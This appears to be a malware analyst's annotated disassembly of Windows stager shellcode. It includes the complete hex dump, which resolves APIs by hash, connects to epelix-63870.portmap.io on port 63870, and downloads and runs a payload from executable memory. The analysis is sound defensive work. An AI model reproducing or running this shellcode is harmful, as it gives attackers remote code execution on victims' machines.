shellcode disams
## uploaded by @JohnLaTwC | |
https://www.virustotal.com/en/file/0c30d700b131246e302ff3da1c4180d21f4650db072e287d1b9d477fe88d312f/analysis/ | |
https://docs.microsoft.com/en-us/windows/desktop/api/wininet/nf-wininet-internetconnecta | |
void InternetConnectA( | |
HINTERNET hInternet, | |
LPCSTR lpszServerName, | |
INTERNET_PORT nServerPort, | |
LPCSTR lpszUserName, | |
LPCSTR lpszPassword, | |
DWORD dwService, | |
DWORD dwFlags, | |
DWORD_PTR dwContext | |
); | |
Hex dump: fc e8 82 00 00 00 60 89 e5 31 c0 64 8b 50 30 8b 52 0c 8b 52 14 8b 72 28 0f b7 4a 26 31 ff ac 3c 61 7c 02 2c 20 c1 cf 0d 01 c7 e2 f2 52 57 8b 52 10 8b 4a 3c 8b 4c 11 78 e3 48 01 d1 51 8b 59 20 01 d3 8b 49 18 e3 3a 49 8b 34 8b 01 d6 31 ff ac c1 cf 0d 01 c7 38 e0 75 f6 03 7d f8 3b 7d 24 75 e4 58 8b 58 24 01 d3 66 8b 0c 4b 8b 58 1c 01 d3 8b 04 8b 01 d0 89 44 24 24 5b 5b 61 59 5a 51 ff e0 5f 5f 5a 8b 12 eb 8d 5d 68 6e 65 74 00 68 77 69 6e 69 54 68 4c 77 26 07 ff d5 31 db 53 53 53 53 53 68 3a 56 79 a7 ff d5 53 53 6a 03 53 53 68 7e f9 00 00 e8 b0 00 00 00 2f 67 53 4d 37 34 54 51 53 41 30 75 51 7a 70 48 50 79 7a 62 38 70 41 33 70 2d 32 59 6d 33 00 50 68 57 89 9f c6 ff d5 89 c6 53 68 00 32 e0 84 53 53 53 57 53 56 68 eb 55 2e 3b ff d5 96 6a 0a 5f 68 80 33 00 00 89 e0 6a 04 50 6a 1f 56 68 75 46 9e 86 ff d5 53 53 53 53 56 68 2d 06 18 7b ff d5 85 c0 75 16 68 88 13 00 00 68 44 f0 35 e0 ff d5 4f 75 cd 68 f0 b5 a2 56 ff d5 6a 40 68 00 10 00 00 68 00 00 40 00 53 68 58 a4 53 e5 ff d5 93 53 53 89 e7 57 68 00 20 00 00 53 56 68 12 96 89 e2 ff d5 85 c0 74 cd 8b 07 01 c3 85 c0 75 e5 58 c3 5f e8 69 ff ff ff 65 70 65 6c 69 78 2d 36 33 38 37 30 2e 70 6f 72 74 6d 61 70 2e 69 6f 00 | |
0x00000000 fc cld | |
0x00000001 e882000000 call 0x00000088 | |
0x00000006 60 pushad | |
0x00000007 89e5 mov ebp,esp | |
0x00000009 31c0 xor eax,eax | |
0x0000000b 648b5030 fs: mov edx,dword [eax + 48] <-- fs:[0x30] = PEB; the +0xc and +0x14 loads that follow walk PEB->Ldr->InMemoryOrderModuleList | |
0x0000000f 8b520c mov edx,dword [edx + 12] | |
0x00000012 8b5214 mov edx,dword [edx + 20] | |
0x00000015 8b7228 mov esi,dword [edx + 40] | |
0x00000018 0fb74a26 movzx ecx,word [edx + 38] | |
0x0000001c 31ff xor edi,edi | |
0x0000001e ac lodsb | |
0x0000001f 3c61 cmp al,97 | |
0x00000021 7c02 jl 0x00000025 | |
0x00000023 2c20 sub al,32 | |
0x00000025 c1cf0d ror edi,13 | |
0x00000028 01c7 add edi,eax | |
0x0000002a e2f2 loop 0x0000001e <-- end of the ror-13 hash loop over the module name (lowercase letters are upper-cased by the sub al,32 at 0x23 first) | |
0x0000002c 52 push edx | |
0x0000002d 57 push edi | |
0x0000002e 8b5210 mov edx,dword [edx + 16] | |
0x00000031 8b4a3c mov ecx,dword [edx + 60] | |
0x00000034 8b4c1178 mov ecx,dword [ecx + edx + 120] | |
0x00000038 e348 jecxz 0x00000082 | |
0x0000003a 01d1 add ecx,edx | |
0x0000003c 51 push ecx | |
0x0000003d 8b5920 mov ebx,dword [ecx + 32] | |
0x00000040 01d3 add ebx,edx | |
0x00000042 8b4918 mov ecx,dword [ecx + 24] | |
0x00000045 e33a jecxz 0x00000081 | |
0x00000047 49 dec ecx | |
0x00000048 8b348b mov esi,dword [ebx + ecx * 4] | |
0x0000004b 01d6 add esi,edx | |
0x0000004d 31ff xor edi,edi | |
0x0000004f ac lodsb | |
0x00000050 c1cf0d ror edi,13 | |
0x00000053 01c7 add edi,eax | |
0x00000055 38e0 cmp al,ah | |
0x00000057 75f6 jnz 0x0000004f | |
0x00000059 037df8 add edi,dword [ebp - 8] | |
0x0000005c 3b7d24 cmp edi,dword [ebp + 36] | |
0x0000005f 75e4 jnz 0x00000045 | |
0x00000061 58 pop eax | |
0x00000062 8b5824 mov ebx,dword [eax + 36] | |
0x00000065 01d3 add ebx,edx | |
0x00000067 668b0c4b mov cx,word [ebx + ecx * 2] | |
0x0000006b 8b581c mov ebx,dword [eax + 28] | |
0x0000006e 01d3 add ebx,edx | |
0x00000070 8b048b mov eax,dword [ebx + ecx * 4] | |
0x00000073 01d0 add eax,edx | |
0x00000075 89442424 mov dword [esp + 36],eax | |
0x00000079 5b pop ebx | |
0x0000007a 5b pop ebx | |
0x0000007b 61 popad | |
0x0000007c 59 pop ecx | |
0x0000007d 5a pop edx | |
0x0000007e 51 push ecx | |
0x0000007f ffe0 jmp eax | |
0x00000081 5f pop edi | |
0x00000082 5f pop edi | |
0x00000083 5a pop edx | |
0x00000084 8b12 mov edx,dword [edx] | |
0x00000086 eb8d jmp 0x00000015 <-- no export matched in this module: edx = [edx] advanced to the next InMemoryOrder entry, retry from the top | |
0x00000088 5d pop ebp | |
0x00000089 686e657400 push 0x0074656e--> 'ten' | |
0x0000008e 6877696e69 push 0x696e6977--> 'iniw' | |
0x00000093 54 push esp <-- esp points at the "wininet\0" string just assembled by the two pushes above; it is the lpLibFileName argument for the LoadLibraryA call below | |
0x00000094 684c772607 push 0x0726774c--> '&wL' | |
0x00000099 ffd5 call ebp --> kernel32.dll!LoadLibraryA | |
0x0000009b 31db xor ebx,ebx | |
0x0000009d 53 push ebx | |
0x0000009e 53 push ebx | |
0x0000009f 53 push ebx | |
0x000000a0 53 push ebx | |
0x000000a1 53 push ebx | |
0x000000a2 683a5679a7 push 0xa779563a--> 'yV:' | |
0x000000a7 ffd5 call ebp --> wininet.dll!InternetOpenA | |
0x000000a9 53 push ebx | |
0x000000aa 53 push ebx | |
0x000000ab 6a03 push 3 | |
0x000000ad 53 push ebx | |
0x000000ae 53 push ebx | |
0x000000af 687ef90000 push 0x0000f97e <-- nServerPort = 0xf97e = 63870 (the same number appears in the hostname in the byte dump) | |
0x000000b4 e8b0000000 call 0x00000169 | |
0x000000b9 2f das <-- start of URL path string (data, not code: the disassembly from here up to the 0x00 terminator at 0xd7 is meaningless) | |
0x000000ba 6753 push ebx | |
0x000000bc 4d dec ebp | |
0x000000bd 37 aaa | |
0x000000be 3454 xor al,84 | |
0x000000c0 51 push ecx | |
0x000000c1 53 push ebx | |
0x000000c2 41 inc ecx | |
0x000000c3 307551 xor byte [ebp + 81],dh | |
0x000000c6 7a70 jpe 0x00000138 | |
0x000000c8 48 dec eax | |
0x000000c9 50 push eax | |
0x000000ca 797a jns 0x00000146 | |
0x000000cc 6238 bound edi,dword [eax] | |
0x000000ce 7041 jo 0x00000111 | |
0x000000d0 33702d xor esi,dword [eax + 45] | |
0x000000d3 32596d xor bl,byte [ecx + 109] | |
0x000000d6 3300 xor eax,dword [eax] | |
0x000000d8 50 push eax | |
0x000000d9 6857899fc6 push 0xc69f8957 | |
0x000000de ffd5 call ebp --> wininet.dll!InternetConnectA <-- hInternet = eax, lpszServerName = the return address pushed by the call at 0x16a (hostname string at 0x16f), nServerPort = 0xf97e, dwService = 3 | |
0x000000e0 89c6 mov esi,eax | |
0x000000e2 53 push ebx | |
0x000000e3 680032e084 push 0x84e03200 | |
0x000000e8 53 push ebx | |
0x000000e9 53 push ebx | |
0x000000ea 53 push ebx | |
0x000000eb 57 push edi | |
0x000000ec 53 push ebx | |
0x000000ed 56 push esi | |
0x000000ee 68eb552e3b push 0x3b2e55eb--> ';.U' | |
0x000000f3 ffd5 call ebp --> wininet.dll!HttpOpenRequestA | |
0x000000f5 96 xchg eax,esi | |
0x000000f6 6a0a push 10 | |
0x000000f8 5f pop edi <-- edi = 10: retry budget for HttpSendRequestA; each failure sleeps 0x1388 = 5000 ms (0x11d) before retrying, then ExitProcess | |
0x000000f9 6880330000 push 0x00003380 | |
0x000000fe 89e0 mov eax,esp | |
0x00000100 6a04 push 4 | |
0x00000102 50 push eax | |
0x00000103 6a1f push 31 | |
0x00000105 56 push esi | |
0x00000106 6875469e86 push 0x869e4675--> 'Fu' | |
0x0000010b ffd5 call ebp --> wininet.dll!InternetSetOptionA <-- option 31 = INTERNET_OPTION_SECURITY_FLAGS, set to the 0x3380 SECURITY_FLAG_* mask stored on the stack at [eax] | |
0x0000010d 53 push ebx | |
0x0000010e 53 push ebx | |
0x0000010f 53 push ebx | |
0x00000110 53 push ebx | |
0x00000111 56 push esi | |
0x00000112 682d06187b push 0x7b18062d--> '{-' | |
0x00000117 ffd5 call ebp --> wininet.dll!HttpSendRequestA | |
0x00000119 85c0 test eax,eax | |
0x0000011b 7516 jnz 0x00000133 | |
0x0000011d 6888130000 push 0x00001388 | |
0x00000122 6844f035e0 push 0xe035f044--> '5D' | |
0x00000127 ffd5 call ebp --> kernel32.dll!Sleep | |
0x00000129 4f dec edi | |
0x0000012a 75cd jnz 0x000000f9 | |
0x0000012c 68f0b5a256 push 0x56a2b5f0 | |
0x00000131 ffd5 call ebp --> kernel32.dll!ExitProcess | |
0x00000133 6a40 push 64 | |
0x00000135 6800100000 push 4096 | |
0x0000013a 6800004000 push 0x00400000 | |
0x0000013f 53 push ebx | |
0x00000140 6858a453e5 push 0xe553a458--> 'SX' | |
0x00000145 ffd5 call ebp --> kernel32.dll!VirtualAlloc <-- VirtualAlloc(NULL, 0x400000, MEM_COMMIT (0x1000), PAGE_EXECUTE_READWRITE (0x40)): RWX buffer that the InternetReadFile loop below fills | |
0x00000147 93 xchg eax,ebx | |
0x00000148 53 push ebx | |
0x00000149 53 push ebx | |
0x0000014a 89e7 mov edi,esp | |
0x0000014c 57 push edi | |
0x0000014d 6800200000 push 0x00002000 | |
0x00000152 53 push ebx | |
0x00000153 56 push esi | |
0x00000154 68129689e2 push 0xe2899612 | |
0x00000159 ffd5 call ebp --> wininet.dll!InternetReadFile | |
0x0000015b 85c0 test eax,eax | |
0x0000015d 74cd jz 0x0000012c | |
0x0000015f 8b07 mov eax,dword [edi] | |
0x00000161 01c3 add ebx,eax | |
0x00000163 85c0 test eax,eax | |
0x00000165 75e5 jnz 0x0000014c | |
0x00000167 58 pop eax | |
0x00000168 c3 ret <-- after the read loop: the pop discards the byte-count slot, then ret pops the buffer base pushed at 0x148 and transfers control into the downloaded data | |
0x00000169 5f pop edi | |
0x0000016a e869ffffff call 0x000000d8 | |
0x0000016f 657065 gs: jo 0x000001d7 <--- start of hostname string (data, not code; its address is the return address pushed by the call at 0x16a and consumed as lpszServerName) | |
0x00000172 6c insb byte [esi],edx | |
0x00000173 69782d36333837 imul edi,dword [eax + 45],0x37383336 | |
0x0000017a 302e xor byte [esi],ch | |
0x0000017c 706f jo 0x000001ed | |
0x0000017e 7274 jc 0x000001f4 | |
0x00000180 6d insd dword [esi],edx | |
0x00000181 61 popad | |
0x00000182 702e jo 0x000001b2 | |
Byte Dump: | |
......`..1.d.P0.R.R..r(..J&1..<a|.,......RW.R..J<.L.x.H..Q.Y...I..:I.4...1......8.u..}.;}$u.X.X$..f.K.X.........D$$[[aYZQ..__Z....]hnet.hwiniThLw&...1.SSSSSh:Vy...SSj.SSh~......../gSM74TQSA0uQzpHPyzb8pA3p-2Ym3.PhW.......Sh.2..SSSWSVh.U.;...j_h.3....j.Pj.VhuF....SSSSVh-..{[email protected][email protected]._.i...epelix-63870.portmap.io. | |